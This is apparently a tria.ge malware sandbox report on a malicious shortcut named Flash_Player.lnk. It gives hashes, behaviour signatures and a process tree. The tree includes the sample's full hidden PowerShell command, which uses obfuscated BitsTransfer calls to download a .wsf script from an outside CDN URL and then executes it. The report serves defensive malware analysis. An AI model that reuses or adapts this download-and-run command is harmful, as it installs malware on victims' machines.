Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
12/05/2024, 01:00
Static task
static1
Behavioral task
behavioral1
Sample
Flash_Player.lnk
Resource
win7-20240221-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
Flash_Player.lnk
Resource
win10v2004-20240508-en
6 signatures
150 seconds
General
-
Target
Flash_Player.lnk
-
Size
3KB
-
MD5
a591b0170684749815c8643e4e6276fc
-
SHA1
caf54132c73b833a654fe90e8d9842bd00fc4d85
-
SHA256
565836c76728f4e8e371a4cc8e35a76d24c52bb995607d63002bf893b51b5ede
-
SHA512
b6e3ac67762a339e1ff22e93749d944c111f536a5735fcdb496bbb3e83f1dcbe522c3a183a9ed1c6b711f096e468c12b4857bf0908272a549a9c187a384e3f42
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2708 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2708 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1812 wrote to memory of 2708 1812 cmd.exe 29 PID 1812 wrote to memory of 2708 1812 cmd.exe 29 PID 1812 wrote to memory of 2708 1812 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Flash_Player.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -command Set-Variable -Name dkn -value BitsTransfer;Import-Module $dkn; Set-Variable -Name tla -value https;Set-Variable -Name qhu -value wsf;Start-BitsTransfer "$tla`://1263929185.rsc.cdn77.org/p2rv2.php?aHR0cHM6Ly8xMjYzOTI5MTg1LnJzYy5jZG43Ny5vcmd8SkJONQ%3D%3D" "$env:ALLUSERSPROFILE\jli.$qhu"; Start-Process "$env:ALLUSERSPROFILE\jli.$qhu";2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-